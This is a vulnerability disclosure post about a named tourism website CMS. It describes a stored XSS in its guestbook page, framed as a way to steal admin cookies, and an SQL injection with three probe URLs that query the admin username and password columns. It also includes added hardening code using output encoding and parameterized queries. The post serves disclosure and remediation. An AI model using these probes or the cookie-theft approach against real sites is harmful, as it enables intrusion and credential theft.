雨楠 (Yunan) Tourism Website Service Management System v2013.6.11: latest 0day vulnerabilities

Vulnerability 1

Vulnerability type: stored XSS

Code file: LstBook.Asp

Code:
------------------------------------------------
[php]
If action="addbook" Then
    If Trim(Request("xm"))="" Then
        Call alert("姓名不能为空","-1")
    End If
    If Trim(Request("sj"))="" Then
        Call alert("手机不能为空","-1")
    End If
    If Trim(Request("dz"))="" Then
        Call alert("地址不能为空","-1")
    End if

    Set oRs=server.createobject("adodb.recordset")
    sSql="Select * from [LstBook]"
    oRs.open sSql,oconn,1,3
    oRs.addnew
    oRs("xm")=Trim(Request("xm"))
    oRs("sj")=Trim(Request("sj"))
    oRs("dz")=Trim(Request("dz"))
    oRs("qq")=Trim(Request("qq"))
    oRs("email")=Trim(Request("email"))
    oRs("ly")=Trim(Request("ly"))
    oRs("time")=now()
    oRs("state")=0
    oRs.update
    oRs.close
    Call Alert("您的留言提交成功,我们将尽快给您解答。","/lstbook.asp")
    Set oRs = Nothing
[/php]
--------------------------------------------------------------

Exploitation notes: the code above only strips whitespace with Trim and nothing else, so... heh. This XSS can be used to grab cookies and get into the admin backend!
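For comparison, here is a hardened form of the same guestbook handler together with an admin-side listing that renders the stored fields. It is an example added to this post, not the vendor's code. It assumes the same oConn, alert() and [LstBook] table as the snippet above; the column lengths (50/20/200/1000) and the listing markup are assumptions. The stored text is left unchanged in the database; what stops the script from running in the administrator's browser is that every field is passed through Server.HTMLEncode at output time.

```vbscript
<%
' Added hardening example for LstBook.Asp; it is not the vendor's code.
' Assumes the same oConn, alert() and [LstBook] table as the original snippet.
' Column lengths used below are assumptions; adjust them to the real schema.

' Read one form field, trim it and cap its length.
' Request.Form is used instead of the bare Request collection so that a
' value cannot be smuggled in through the query string.
Function CleanField(name, maxLen)
    Dim v
    v = Trim(Request.Form(name) & "")
    If Len(v) > maxLen Then v = Left(v, maxLen)
    CleanField = v
End Function

' Write a stored value into HTML with <, >, &, " encoded, so a message such as
' <script>...</script> is shown as text instead of executed when an
' administrator opens the guestbook list.
Sub WriteEncoded(value)
    Response.Write Server.HTMLEncode(value & "")   ' & "" turns a Null field into ""
End Sub

If action = "addbook" Then
    Dim xm, sj, dz, qq, email, ly
    xm    = CleanField("xm", 50)
    sj    = CleanField("sj", 20)
    dz    = CleanField("dz", 200)
    qq    = CleanField("qq", 20)
    email = CleanField("email", 100)
    ly    = CleanField("ly", 1000)

    ' End the response after each alert in case alert() itself does not,
    ' so an incomplete record is never written.
    If xm = "" Then Call alert("姓名不能为空", "-1") : Response.End
    If sj = "" Then Call alert("手机不能为空", "-1") : Response.End
    If dz = "" Then Call alert("地址不能为空", "-1") : Response.End

    ' Storing the raw text is fine; the defence is applied where it is rendered.
    Dim oRs
    Set oRs = Server.CreateObject("ADODB.Recordset")
    oRs.Open "Select * from [LstBook]", oConn, 1, 3
    oRs.AddNew
    oRs("xm") = xm : oRs("sj") = sj : oRs("dz") = dz
    oRs("qq") = qq : oRs("email") = email : oRs("ly") = ly
    oRs("time") = Now() : oRs("state") = 0
    oRs.Update
    oRs.Close
    Set oRs = Nothing
    Call Alert("您的留言提交成功,我们将尽快给您解答。", "/lstbook.asp")
End If

' Admin-side listing (assumed layout): every stored field goes through WriteEncoded.
Dim oList
Set oList = oConn.Execute("SELECT xm, sj, dz, ly FROM [LstBook] ORDER BY [time] DESC")
Do Until oList.EOF
    Response.Write "<tr><td>" : WriteEncoded oList("xm")
    Response.Write "</td><td>" : WriteEncoded oList("sj")
    Response.Write "</td><td>" : WriteEncoded oList("dz")
    Response.Write "</td><td>" : WriteEncoded oList("ly")
    Response.Write "</td></tr>" & vbCrLf
    oList.MoveNext
Loop
oList.Close
Set oList = Nothing
%>
```

Server.HTMLEncode is only correct for text placed between tags or inside a double-quoted attribute; a value written into a JavaScript string or a URL would need its own encoding. Marking the admin session cookie HttpOnly further limits the cookie theft the post describes, since a script that does run cannot read such a cookie.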

Vulnerability 2

Vulnerability type: SQL injection

Code file: LstInfo.asp

Code:

------------------------------------------------
[php]
<%
If Id="" Then
    Call alert("参数错误,返回首页.","/")
End If

' this page
Set v= oConn.Execute("SELECT top 1 * FROM [LstJob] where Id ="&Id)
If v.bof And v.eof Then
    Call BackUrl("/")
End If

oConn.Execute("UPDATE [LstJob] SET Jobhits = Jobhits +1 where Id ="&Id)
[/php]
--------------------------------------------------------------
Code notes: the Id variable lives in the "" file, and in conn.asp it is read straight from Request, so the problem is obvious!

PS: three basic test statements are listed below. Work out the rest yourself!

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select * from lstadmin)

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usradmin from lstadmin)

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usrpass from lstadmin)
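A hardened form of the LstInfo.asp fragment above, added here as an example and not taken from the vendor's code. It assumes that oConn, alert() and BackUrl() exist as in the original, that Id arrives in the query string, and that the Id column is an integer. The value is checked against a strict integer pattern and then bound through an ADODB.Command parameter, so text appended to it (such as the `Id=1 and exists(...)` probes listed above) never becomes part of the SQL statement:

```vbscript
<%
' Added hardening example for LstInfo.asp; it is not the vendor's code.
' Assumes oConn, alert() and BackUrl() exist as in the original page.

' IsNumeric() is too permissive for an id (it accepts "1e3", "&H1F", " 1 ",
' "1,000"), so require an unsigned decimal string of at most 9 digits.
' Returns the id as a Long, or -1 when the input is not acceptable.
Function ParseId(raw)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    ParseId = -1
    If re.Test(raw & "") Then ParseId = CLng(raw)
End Function

' Run one statement with Id bound as an integer parameter.
' 1 = adCmdText, 3 = adInteger, 1 = adParamInput (ADO constants written out
' because adovbs.inc may not be included on this page).
Function RunWithId(sql, idValue)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = oConn
    cmd.CommandType = 1
    cmd.CommandText = sql
    cmd.Parameters.Append cmd.CreateParameter("Id", 3, 1, , idValue)
    Set RunWithId = cmd.Execute
End Function

' Read the parameter explicitly here instead of relying on a global
' populated by conn.asp from the bare Request collection.
Dim Id
Id = ParseId(Request.QueryString("Id"))
If Id < 0 Then
    Call alert("参数错误,返回首页.", "/")
    Response.End
End If

' this page
Dim v
Set v = RunWithId("SELECT TOP 1 * FROM [LstJob] WHERE Id = ?", Id)
If v.BOF And v.EOF Then
    Call BackUrl("/")
    Response.End
End If

' The hit counter uses the same bound parameter.
RunWithId "UPDATE [LstJob] SET Jobhits = Jobhits + 1 WHERE Id = ?", Id
%>
```

With the parameter bound this way, a request such as `Id=1 and exists(select * from lstadmin)` fails the `^\d{1,9}$` check and is rejected before any query runs; even if the check were removed, the driver would treat the whole value as data for the `?` placeholder rather than as SQL, which is what makes the parameterized form the actual fix rather than the regular expression alone.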
